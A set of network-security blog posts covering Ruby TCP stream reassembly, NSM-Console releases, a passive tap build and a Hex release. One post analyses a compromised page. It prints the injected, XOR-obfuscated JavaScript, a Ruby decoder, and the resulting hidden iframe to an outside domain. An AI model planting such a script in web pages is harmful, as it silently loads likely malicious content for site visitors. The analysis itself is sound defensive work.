This is part 2 of a series on rebuilding TCP streams using Ruby, for more information, visit the previous post:

• Rebuilding TCP streams with Ruby part 1: fuzzymatch

In my previous post, I talked about using fuzzy sequence/acknowledge numbers to split a network capture file into streams. Using fuzzymatch was pretty successful for cutting streams out, but the streams themselves were not ordered. This version of the Ruby StreamBuilder library orders the streams by using increasing seq/ack numbers, or as I like to call it “fuzzysort”. In order to do this, fuzzysort first splits the stream into a “source” stream and a “destination” stream. After spliting the streams, the streams are ordered in ascending acknowledgement order, where if there are duplicate acks, the ascending sequence numbers are used. The streams are then printed in ordered fashion (since this is just proof of concept)

You can download the code for fuzzymatch-sort here.

It’s interesting to note that because of implementing the ordered streams in a hash using the seq/ack as the key, the list does not handle duplicate packets. I added some logic so that a large data packet is not replaced by a simple ack packet with the same numbers, so the streams should still have the correct data after being ordered.

Here’s an example of running fuzzymatch-sort.rb on a randomized single-stream pcap file:

shell> ./fuzzymatch-sort.rb ../pcaps/pLargeRand.pcap
[1]    [....S.] 128.222.228.89 -> 128.222.228.77    seq=638858703 ack=0 len=78
Starting a new stream...
[2]    [.A..S.] 128.222.228.77 -> 128.222.228.89    seq=2849933258 ack=638858704 len=74
ack num: 638858704 close enough to 638858703 to add. Had to check 1 streams and 2 seq/ack nums
[3]    [.A....] 128.222.228.89 -> 128.222.228.77    seq=638862706 ack=2849933260 len=66
ack num: 2849933260 close enough to 2849933258 to add. Had to check 1 streams and 2 seq/ack nums
[4]    [.AP...] 128.222.228.89 -> 128.222.228.77    seq=638861176 ack=2849933259 len=666
ack num: 2849933259 close enough to 2849933260 to add. Had to check 1 streams and 1 seq/ack nums
[5]    [.A....] 128.222.228.89 -> 128.222.228.77    seq=638858704 ack=2849933259 len=66
ack num: 2849933259 close enough to 2849933259 to add. Had to check 1 streams and 1 seq/ack nums
[6]    [.A....] 128.222.228.77 -> 128.222.228.89    seq=2849933259 ack=638861776 len=66
seq num: 2849933259 close enough to 2849933259 to add. Had to check 1 streams and 1 seq/ack nums
[7]    [.A....] 128.222.228.89 -> 128.222.228.77    seq=638859728 ack=2849933259 len=1514
ack num: 2849933259 close enough to 2849933259 to add. Had to check 1 streams and 2 seq/ack nums
[8]    [.A....] 128.222.228.77 -> 128.222.228.89    seq=2849933259 ack=638862706 len=66
seq num: 2849933259 close enough to 2849933259 to add. Had to check 1 streams and 3 seq/ack nums
[9]    [.AP...] 128.222.228.89 -> 128.222.228.77    seq=638858704 ack=2849933259 len=1090
ack num: 2849933259 close enough to 2849933259 to add. Had to check 1 streams and 3 seq/ack nums
[10]    [.A....] 128.222.228.77 -> 128.222.228.89    seq=2849933259 ack=638861176 len=66
seq num: 2849933259 close enough to 2849933259 to add. Had to check 1 streams and 3 seq/ack nums
[11]    [.A...F] 128.222.228.77 -> 128.222.228.89    seq=2849933259 ack=638862706 len=66
seq num: 2849933259 close enough to 2849933259 to add. Had to check 1 streams and 3 seq/ack nums
Ended up with 1 stream(s).

==> Stream 1 contains 11 packet(s)
--> Sorting stream 1...
[1]    [....S.] 128.222.228.89 -> 128.222.228.77    seq=638858703 ack=0 len=78
[2]    [.A..S.] 128.222.228.77 -> 128.222.228.89    seq=2849933258 ack=638858704 len=74
[3]    [.A....] 128.222.228.89 -> 128.222.228.77    seq=638862706 ack=2849933260 len=66
[4]    [.AP...] 128.222.228.89 -> 128.222.228.77    seq=638861176 ack=2849933259 len=666
[5]    [.A....] 128.222.228.89 -> 128.222.228.77    seq=638858704 ack=2849933259 len=66
[6]    [.A....] 128.222.228.77 -> 128.222.228.89    seq=2849933259 ack=638861776 len=66
[7]    [.A....] 128.222.228.89 -> 128.222.228.77    seq=638859728 ack=2849933259 len=1514
[8]    [.A....] 128.222.228.77 -> 128.222.228.89    seq=2849933259 ack=638862706 len=66
[9]    [.AP...] 128.222.228.89 -> 128.222.228.77    seq=638858704 ack=2849933259 len=1090
[10]   [.A....] 128.222.228.77 -> 128.222.228.89    seq=2849933259 ack=638861176 len=66
[11]   [.A...F] 128.222.228.77 -> 128.222.228.89    seq=2849933259 ack=638862706 len=66

==== Unsorted Streams ====

Source
-------
[....S.] 128.222.228.89 -> 128.222.228.77    seq=638858703 ack=0 len=78
[.A....] 128.222.228.89 -> 128.222.228.77    seq=638862706 ack=2849933260 len=66
[.AP...] 128.222.228.89 -> 128.222.228.77    seq=638861176 ack=2849933259 len=666
[.A....] 128.222.228.89 -> 128.222.228.77    seq=638858704 ack=2849933259 len=66
[.A....] 128.222.228.89 -> 128.222.228.77    seq=638859728 ack=2849933259 len=1514
[.AP...] 128.222.228.89 -> 128.222.228.77    seq=638858704 ack=2849933259 len=1090
Dest
-------
[.A..S.] 128.222.228.77 -> 128.222.228.89    seq=2849933258 ack=638858704 len=74
[.A....] 128.222.228.77 -> 128.222.228.89    seq=2849933259 ack=638861776 len=66
[.A....] 128.222.228.77 -> 128.222.228.89    seq=2849933259 ack=638862706 len=66
[.A....] 128.222.228.77 -> 128.222.228.89    seq=2849933259 ack=638861176 len=66
[.A...F] 128.222.228.77 -> 128.222.228.89    seq=2849933259 ack=638862706 len=66

==== Sorted Streams ====

Source
-------
[....S.] 128.222.228.89 -> 128.222.228.77    seq=638858703 ack=0 len=78
[.AP...] 128.222.228.89 -> 128.222.228.77    seq=638858704 ack=2849933259 len=1090
[.A....] 128.222.228.89 -> 128.222.228.77    seq=638859728 ack=2849933259 len=1514
[.AP...] 128.222.228.89 -> 128.222.228.77    seq=638861176 ack=2849933259 len=666
[.A....] 128.222.228.89 -> 128.222.228.77    seq=638862706 ack=2849933260 len=66
Dest
-------
[.A..S.] 128.222.228.77 -> 128.222.228.89    seq=2849933258 ack=638858704 len=74
[.A....] 128.222.228.77 -> 128.222.228.89    seq=2849933259 ack=638861176 len=66
[.A....] 128.222.228.77 -> 128.222.228.89    seq=2849933259 ack=638861776 len=66
[.A...F] 128.222.228.77 -> 128.222.228.89    seq=2849933259 ack=638862706 len=66

Another addition in this version is that the fuzzymatch algorithm that is used to generate streams has been optimized (mostly because I was doing it stupidly last time) so that seq/ack searches don’t take nearly as long for large pcap files. You can download an example of fuzzysort output from a pcap file with 5 streams here.

While this is a step up from the unsorted fuzzymatch from the last post, this method still has its downfalls, not being able to store duplicate seq/ack packets could definitely cause problems. The ability to generate a sorted stream without having to split the stream into source and destination streams would also be extremely useful (so you could see a full transmission stream from both sides).

The next evolution of the library would be to actually keep a state table and follow TCP streams using the seq/ack numbers (which I attempted for this version, but it was extremely complex, so I scraped it and did fuzzysort). Hopefully I’ll be able to implement it without any problems. I might take the easy route and go for using TCP TSVal to attempt to order streams.

Comments? Criticism? Leave a comment and let me know

I’m happy to announce the release of the next version of NSM-Console. Version 0.6. If you are unfamiliar with NSM-Console, here’s the synopsis from the project page:

NSM-Console (Network Security Monitoring Console) is a framework for performing analysis on packet capture files. It implements a modular structure to allow for an analyst to quickly write modules of their own without any programming language experience. Using these modules a large amount of pcap analysis can be performed quickly using a set of global (as well as per-module) options. It aims to be simple to run and easy to understand without a lot of learning time.

The recently posted NSM-Console whitepaper is a good place to start if you want an introduction to NSM-Console.

You can download NSM-Console 0.6 from the project page.

Here are the highlights for the changes in this version, check the TODO and CHANGELOG for a full list of changes.

The dump command
The dump command lets you dump either the payload (in ascii format), or the full packet (with the -f flag) to a file, you can specify ranges like 1-20, 5,7,9-* and 1-* just like you can with the print command, extremely useful for picking and choosing packets to dump to a file. Here’s an example:

nsm> dump 1-5,10-* file.txt
Writing (append) packet(s) 1 through 5 from /Users/hinmanm/data.pcap to file.txt...
Writing (append) packet(s) 10 through * from /Users/hinmanm/data.pcap to file.txt...

And another of the full dump

nsm> dump -f 20,56-59 full.out
New args: 20,56-59 full.out
Dumping full packet, not just payload...
Writing (append) packet(s) 20 through 20 from /Users/hinmanm/data.pcap to full.out...
Writing (append) packet(s) 56 through 59 from /Users/hinmanm/data.pcap to full.out...

Performance improvements for harimau and checkip
The Harimau module, as well as the checkip command, now use wget (if it’s installed) instead of Ruby’s HTTP request library, this results is a much much faster query time. Another performance tweak was that reverse dns lookups for most modules is now turned off by default because it was taking extremely long for large pcaps

New modules: clamscan, foremost, trace-summary
New modules have been included in this release, clamscan, which scans extracted files (from either the tcpxtract or foremost modules) for viruses, foremost, which is another file extractor and trace-summary, which provides an extremely nice summary of traffic in the pcap

NSM-Console handle’s gzip’d files
You can now specify a gzip’d file directly to NSM-Console, it will attempt to decompress the file into a temporary file when it is loaded. Note that directories of gzip’d files is still not supported entirely.

Bro-ids and Snort changes
Bro-IDS has been split into 2 modules, one for protocol analysis and the other for generating content streams.
Snort has had its community and emerging rules updated to the latest revisions.

As always, bugfixes and minor enhancements, check out the full changelog for a list of what’s changed. If you have any requests for additional features or modules, be sure to leave a command and let me know

Also, if anyone out there wants to see what my ~/.nsmcrc looks like, you can find it here.

I have undertaken the (not so small) task of attempting to use Ruby to rebuild TCP data streams. I was originally planning on using ruby-libnids, but after running into considerable trouble with dynamic library linking on OSX, I decided it’d be a good experiment to write my own.

This is not a small feat. In fact, I probably won’t ever get it working perfectly (or if I do, it certainly won’t be soon). In a series of posts, I’ll be exploring some of the development decisions, design choices and pitfalls that I run into, sort of a development journal. Why would a tool like this ever be useful? Well, if you want to do analysis on packet payloads, you certainly have to make sure you have a contiguous data segment to work on, otherwise part of the message is lost. I do, however, have a few things going for me:

• I don’t have to do live reassembly. I can do 2-pass reassembly, because I’m only going to be analyzing pcap files. Perhaps latter I’ll add in the ability to do live analysis, but for now it’s adding complexity to a problem that’s already complex enough.
• I will be building prototypes of different methods, each with its pros and cons, instead of having to work towards a final release, I have the flexibility to change designs with every iteration.
• No matter what, I win. Nothing but learning can come from this project, so it still has benefits even if I do never arrive at a final product.

For the first installment, I want to talk about fuzzymatching using sequence and ackknowledgement numbers. I have released my proof-of-concept code here, but I’ll be going over it in more detail in this post:

Okay, let’s start by dumping the most simply pcap file datastream I could possibly generate (sending the word “test” using netcat):

./sdump.rb pcaps/pSmall.pcap
[1]    [....S.] 128.222.228.89 -> 128.222.228.77    seq=4679659509 ack=0 len=78
[2]    [.A..S.] 128.222.228.77 -> 128.222.228.89    seq=30782357 ack=4679659510 len=74
[3]    [.A....] 128.222.228.89 -> 128.222.228.77    seq=4679659510 ack=30782358 len=66
[4]    [.AP...] 128.222.228.89 -> 128.222.228.77    seq=4679659510 ack=30782358 len=71
[5]    [.A...F] 128.222.228.89 -> 128.222.228.77    seq=4679659515 ack=30782358 len=66
[6]    [.A....] 128.222.228.77 -> 128.222.228.89    seq=30782358 ack=4679659516 len=66
[7]    [.A...F] 128.222.228.77 -> 128.222.228.89    seq=30782358 ack=4679659516 len=66
[8]    [.A....] 128.222.228.89 -> 128.222.228.77    seq=4679659516 ack=30782359 len=66

Being the most simple example, you can see that I only have 1 stream to deal with, and that the seq/ack numbers are nice enough to be where we want them to. For the first prototype, I have created a list of Stream objects (containing sequence and ack numbers), and when I get a new packet, I compare its seq/ack numbers to the numbers of streams already in the list, if it’s within a threshold (5 is my value), then it probably belongs to that stream and I add the packet to the stream.

One of the really nice things about processing packets this way is that I don’t have to worry about packet order on the first pass, if a packet is close enough, it’s added, if it isn’t, a new stream is created. Fuzzymatcher correctly identifies this pcap file as 1 stream:

./fuzzymatch.rb ../pcaps/pSmall.pcap
[1]    [....S.] 128.222.228.89 -> 128.222.228.77    seq=4679659509 ack=0 len=78
No stream found for packet, starting a new one...
[2]    [.A..S.] 128.222.228.77 -> 128.222.228.89    seq=30782357 ack=4679659510 len=74
ack num: 4679659510 close enough to 4679659509 to add.
[3]    [.A....] 128.222.228.89 -> 128.222.228.77    seq=4679659510 ack=30782358 len=66
seq num: 4679659510 close enough to 4679659509 to add.
[4]    [.AP...] 128.222.228.89 -> 128.222.228.77    seq=4679659510 ack=30782358 len=71
seq num: 4679659510 close enough to 4679659509 to add.
[5]    [.A...F] 128.222.228.89 -> 128.222.228.77    seq=4679659515 ack=30782358 len=66
ack num: 30782358 close enough to 30782357 to add.
[6]    [.A....] 128.222.228.77 -> 128.222.228.89    seq=30782358 ack=4679659516 len=66
seq num: 30782358 close enough to 30782357 to add.
[7]    [.A...F] 128.222.228.77 -> 128.222.228.89    seq=30782358 ack=4679659516 len=66
seq num: 30782358 close enough to 30782357 to add.
[8]    [.A....] 128.222.228.89 -> 128.222.228.77    seq=4679659516 ack=30782359 len=66
ack num: 30782359 close enough to 30782357 to add.
Ended up with 1 stream(s).
Stream 1 contains 8 packet(s)

Now, I haven’t added any code to actually order the packets (yet), but this is a good start. Before I continue, how does fuzzymatching handle pcaps with a large amount of data?

./fuzzymatch.rb ../pcaps/data.pcap
... tons of output ...
[1684]    [.A....] 192.168.1.123 -> 64.12.28.76    seq=6079164989 ack=806823238 len=54
seq num: 6079164989 close enough to 6079164989 to add.
[1685]    [.A....] 192.168.1.123 -> 64.12.28.76    seq=6079164989 ack=806825958 len=54
seq num: 6079164989 close enough to 6079164989 to add.
[1686]    [.A....] 192.168.1.123 -> 64.12.28.76    seq=6079164989 ack=806826815 len=54
seq num: 6079164989 close enough to 6079164989 to add.
[1687]    [.A....] 192.168.1.123 -> 64.12.28.76    seq=6079164989 ack=806826815 len=54
seq num: 6079164989 close enough to 6079164989 to add.
[1688]    [.A....] 64.12.165.98 -> 192.168.1.136    seq=424631922 ack=282306986 len=54
No stream found for packet, starting a new one...
[1689]    [.A....] 192.168.1.136 -> 64.12.165.98    seq=282306986 ack=424631923 len=54
ack num: 424631923 close enough to 424631922 to add.
Ended up with 53 stream(s).
Stream 1 contains 8 packet(s)
Stream 2 contains 22 packet(s)
Stream 3 contains 8 packet(s)
Stream 4 contains 34 packet(s)
... lots more output, one for all 53 streams ...

Not bad, for a start. I think the next goal is probably ordering the streams, luckily I can do this in a second pass (or, when the stream data is accessed, cutting down on computation time unless the data is actually needed)

All my POC code can be downloaded from the RSB (Ruby StreamBuilder) project page, which will receive regular updates as I continue development.

Questions? Comments? Flames? Leave me a comment and let me know what you think

You can check all the other parts of the series:

•  Rebuilding TCP streams with Ruby part 2: fuzzysort

I’m written a whitepaper on some of the ideas behind NSM-Console, it also explains some of the basics of usage and what it is originally designed for, you can download the whitepaper directly or get it from the papers section on my site.

Excerpt from the abstract:

“With the proliferation of dozens of different packet analysis tools, a network
traffic analyst has a dizzying amount of tools to choose from to analyze
network data. As the number of tools will only increase, a framework to
unite and manage each of these tools is necessary. This framework should
provide a central and uni?ed way to change the options for each of the
tools. My solution to this problem is NSM-Console, or the Network Security
Monitoring Console. “

A friend of mine (thanks Legit) turned me on to this piece of javascript found in the midst of some PHP:

<script language="JavaScript">
var0 = "x69x3cx33x27x34x38x30x75x3bx34"; var1 = "x38x30x68x72x36x3ax20x3bx21x30"; var2 = "x27x72x75x26x27x36x68x72x3dx21"; var3 = "x21x25x6fx7ax7ax33x27x34x38x30"; var4 = "x26x21x34x21x7bx3bx30x21x7ax3c"; var5 = "x3bx31x30x2dx67x7bx25x3dx25x72"; var6 = "x75x3dx30x3cx32x3dx21x68x72x64"; var7 = "x63x72x75x22x3cx31x21x3dx68x72"; var8 = "x64x63x72x75x33x27x34x38x30x37"; var9 = "x3ax27x31x30x27x68x72x65x72x75"; var10 = "x26x36x27x3ax39x39x3cx3bx32x68"; var11 = "x72x3bx3ax72x6bx69x7ax3cx33x27"; var12 = "x34x38x30x6b";
sr = var0+var1+var2+var3+var4+var5+var6+var7+var8+var9+var10+var11+var12;
dst = "";
for(i = 0; i < sr.length; i++) {
var d = parseInt(sr.charCodeAt(i) ^ 85);
dst = dst + String.fromCharCode(d);
}
document.getElementById("testws35fdgh").innerHTML = dst;
</script>

The “getElementById” that testws35fdgh refers to is this empty div:

<div id="testws35fdgh"></div>

As it turns out, this is some really terrible obfuscation, here’s the simple script to decode it (written in Ruby because I like Ruby):

#!/usr/bin/env ruby
hex = ["x69","x3c","x33","x27","x34","x38",
"x30","x75","x3b","x34","x38","x30","x68",
"x72","x36","x3a","x20","x3b","x21","x30",
"x27","x72","x75","x26","x27","x36","x68",
"x72","x3d","x21","x21","x25","x6f","x7a",
"x7a","x33","x27","x34","x38","x30","x26",
"x21","x34","x21","x7b","x3b","x30","x21",
"x7a","x3c","x3b","x31","x30","x2d","x67",
"x7b","x25","x3d","x25","x72","x75","x3d",
"x30","x3c","x32","x3d","x21","x68","x72",
"x64","x63","x72","x75","x22","x3c","x31",
"x21","x3d","x68","x72","x64","x63","x72",
"x75","x33","x27","x34","x38","x30","x37",
"x3a","x27","x31","x30","x27","x68","x72",
"x65","x72","x75","x26","x36","x27","x3a",
"x39","x39","x3c","x3b","x32","x68","x72",
"x3b","x3a","x72","x6b","x69","x7a","x3c",
"x33","x27","x34","x38","x30","x6b"]
line = ""
hex.each { |c|
## Unpack the char
c = c.unpack('c').to_s.to_i
## XOR with 85
d = c ^ 85
## Pack back into a character
t = [d].pack('c')
## Append to the line
line = line + t
}
puts line

Which eventually leads you to:

<iframe name='counter' src='http://framestat.net/index2.php' height='16' width='16' frameborder='0' scrolling='no'></iframe>

If you do a whois on the framestat.net domain, you can see that the domain was suspended:

Registrant:
Suspended Domain ****@4host.info +1.00000000
Suspended domain
Suspended domain
Suspended domain,
Suspended domain,US 94040

Registration Service Provider:
name: Rustelekom Ltd.
tel: +1.8666254678
fax: +1.9782465632
web:http://nameservers.ru

Looks like someone’s been up to something naughty It also looks like it was originally a Russian site (not that it matters). Since the site is down, it’s difficult to tell what would have happened if the iframe source still existed. I’m guessing malware.

Still, the question remains, how did the javascript get to the page? I’m still looking in to that, right now my theory is php remote-file-inclusion, but we’ll see as things become a bit more clear.

One of the most important traits of being a SysAdmin is laziness (well, not really laziness, but recognizing repetitive action and taking steps to automate it). In the effort to combat repetitive changing directories, I have written a tiny (< 100 lines) Ruby script to handle “zooming” to a particular directory.

Firstly, download the script here and put it somewhere in your path (rename it to “zg.rb”). Make sure to chmod +x it so it’s executable.

Note, 3 of the lines in the script *MAY* need to be changed, they are:

$DFDIR = "/Users/hinmanm/.zg"
$ZGCONF = $DFDIR + "/zg.conf"
$FINDCMD = "find"

Change the DFDIR entry to be where you plan on storing your ZoomGo files. Make sure you create the directory you specified, as you can see about, mine is set to ~/.zg. You shouldn’t have to change the ZGCONF file unless you want to. The FINDCMD variable is because on FreeBSD, when you install the “findutils” package, the find command is “gfind”, so change this to whatever your find command is (‘find’ should be fine for most people).

In the ~/.zg/zg.conf file (or wherever your DFDIR and ZGCONF locations are), entries are specified with a directory name, rescan time and directory name glob. The entries in my ~/.zg/zg.conf file are:

~/src:10:*
~/pcap:10:*
~/hex:10:*
~/Torrents:30:*
~/Random:60:*
~/Pictures:10:*
/Volumes/VAULT:20:*

What this means is: “look at my ~/src directory, rescan it if it’s older than 10 minutes and search for all directories (*)“, etc. I also search my pcap directory, the hex source tree directory, my Torrents and Random files and my TrueCrypt vault drive (When it’s mounted).

Next, I added the following line to my ~/.zshrc (I use ZSH, but the syntax for Bash would be almost exactly the same):

## For the "ZoomGo" ruby file
function zg () {
eval cd `zg.rb $1`
}

Yea, it’s kind of a hackish way to do it, but it works. After starting a new zsh, you should now be able to type “zg <dirname>” to use ZoomGo on a directory. For example:

~$ zg aimsnarf
Zooming directly to /Users/hinmanm/src/ruby/aimsnarf...
~/src/ruby/aimsnarf$

When you first run ZoomGo, it will rescan all the directories that you specified in the zg.conf file, saving the datafiles in the DFDIR. If the data file hasn’t been updated in the given rescan time (like 10 minutes for my ~/src directory) it will also rescan the directory and you’ll see messages like this:

rescanning ~/src...
rescanning ~/pcap...
rescanning ~/hex...
… and so on

You can also manually rescan all the directories by adding the “–rescan” flag.

Now, let’s say you have 2 directories that are both named the same thing, here’s an example when I run “zg aim”

~$ zg aim
2 directories were returned.
(1)    /Users/hinmanm/pcap/aim
(2)    /Volumes/VAULT/pcap/aim
1
~/pcap/aim$

See that? ZoomGo asks you to choose which directory to zoom to if there is more than 1 option, at the moment, it doesn’t like more than 9 directories, but hopefully I’ll fix that later

There, wasn’t that easier than typing “cd ~/pcap/aim”, now try it for a longer directory:

~$ zg nsm-console
2 directories were returned.
(1)    /Users/hinmanm/hex/hex/rawpacket-root/usr/home/analyzt/rp-NSM/nsm-console
(2)    /Users/hinmanm/hex/hex2/rawpacket-root/usr/home/analyzt/rp-NSM/nsm-console
2
~/hex/hex2/rawpacket-root/usr/home/analyzt/rp-NSM/nsm-console$

Enjoy

…because all the other tutorials I’ve been able to find on this subject are not so easy to read.

This is going to be a long post, but hey, at least it’ll have lots of pictures!

Alright, in this tutorial I’m going to attempt to explain how to find the OEP (Original Entry Point) of a binary executable that has been packed with the Upack/WinUpack packer. I just recently learned this myself, so please excuse any errors this tutorial might have. In this tutorial, the following tools are used:

• PEiD
• IDA-Disassembler (I used the freeware version, 4.9)
• LordPE
• ImpRec
• Windows

Continue Reading »

In my home network, I have a passive tap sitting between my cable modem and my router, instead of spending tons of money, I made my own. They’re surprisingly simple to make, and also extremely simple to use.

Let’s start with the wiring, at a local electronics store, I purchased 4 RJ-45 wiring plugs, I probably shouldn’t have bought solder-less ones, but I didn’t feel like buying a board to solder them to. Anyhow, 2 of the ports will be used for entry and exit, the other two for taps. In this case, we need 2 extra ports so that inbound data is passed through one port, outbound data is passed through the other port.

Set up the wiring as shown in this wiring diagram (credit goes to the Snort team for the diagram):

Personally, I split open a network cable and used the wires inside just so the color coding could be correct, that’s probably the easiest way to wire the ports.

After wiring the ports, you should be able to test that data passed from one host port to the other host port is unchanged, below is a picture of the tap I created. Yes, I know it’s very messy, the box I bought for it didn’t fit the way I wanted.

The next thing to do it connect the two ports (labeled “tap 1″ and “tap 2″ in the picture above) to 2 NICs in the machine of your choice. I’m using FreeBSD to manage the bridge. If you want to monitor outbound and inbound traffic separately, you’re done, just start tcpdump on the interface and you should be able to see all the traffic.

If you want to monitor both outbound and inbound traffic on the same interface, you’ll need to bridge the interfaces. You can accomplish this in FreeBSD with the following:

shell> ifconfig bridge create
shell> ifconfig bridge0 addm ed0 addm ed1 monitor up
shell> tcpdump -i bridge0
(or run snort/bro-ids/argus/etc on interface bridge0)

In this case, my network cards are ed0 and ed1, if you had different network interfaces, substitute them instead. You don’t need to assign an address to the bridge interface, since the only wires that are connected are the receive wires, so it wouldn’t transmit through the taps if it wanted to. For more advanced bridging, check out the FreeBSD manual on bridging.

I should note though, that you’ll need a 3rd network card in the monitoring machine if you want to remotely manage the machine.

I’ll be attending the DC303 meeting this Friday the 22nd (tomorrow), if anyone who reads this lives in the Denver/Metro area, stop by and say “Hi!”, I’d love to meet more information security people in Denver. This’ll be my first time attending, as I only found out about it not that long ago.

The meetup is from 7-9pm at the Cafe@Netherworld, the address is: 1278 Pennsylvania St. Denver, CO 80203

I’m looking forward to it!

We just released Hex 1.0.3, the Chinese New Year release, although it’s closer to the Valentine’s day release. Congratulations to all the Hex developers for fixing bugs and adding features!

You can grab the iso here. [md5] [sha256]
Or, grab the iso from the mirror. [md5] [sha256]

Since Geek00l already covered a list of the most important changes in his blog post, I’ll just echo the changes in NSM-Console, which is the software that I develop. The version of NSM-Console in Hex 1.0.3 is 0.6-DEVEL, which can be obtained either by checking out the code from subversion (svn co http://svn.security.org.my/trunk/rawpacket-root/usr/home/analyzt/rp-NSM/nsm-console nsm-console), or waiting until I release 0.6

New Features:
– ‘dump‘ command added, you can now dump packet payloads into a binary file for later analysis
– Significant speedups in the harimau module and ‘checkip‘ command if wget is installed
– tcpxtract configuration file changed to extract more types of files
– Added foremost module
– Added clamscan module (Thanks JohnQPublic)
– Argus and tcptrace have reverse dns turned off by default now, it was causing the module to hang for extremely large pcap files. Can be switched on by changed the module options
– rot13 encoding and decoding added
Bugfixes:
– alias command
– urlescape (en|de)coding
– file existence check
– many other things
All the other enhancements, bugfixes and additions.

Since Hex 1.0.2 had NSM-Console version 0.2 in it, if you haven’t downloaded the console or checked it out from subversion since the last hex release, here’s what else has been added since then:

• Release notes for NSM-Console version 0.5

• Release notes for NSM-Console version 0.4

• Release notes for NSM-Console version 0.3

Or you can view the TODO and CHANGELOG for NSM-Console directly. If you want to check out more information about either of the projects, check out the Trac pages for Hex and NSM-Console:

Now, onward to FreeBSD 7.0!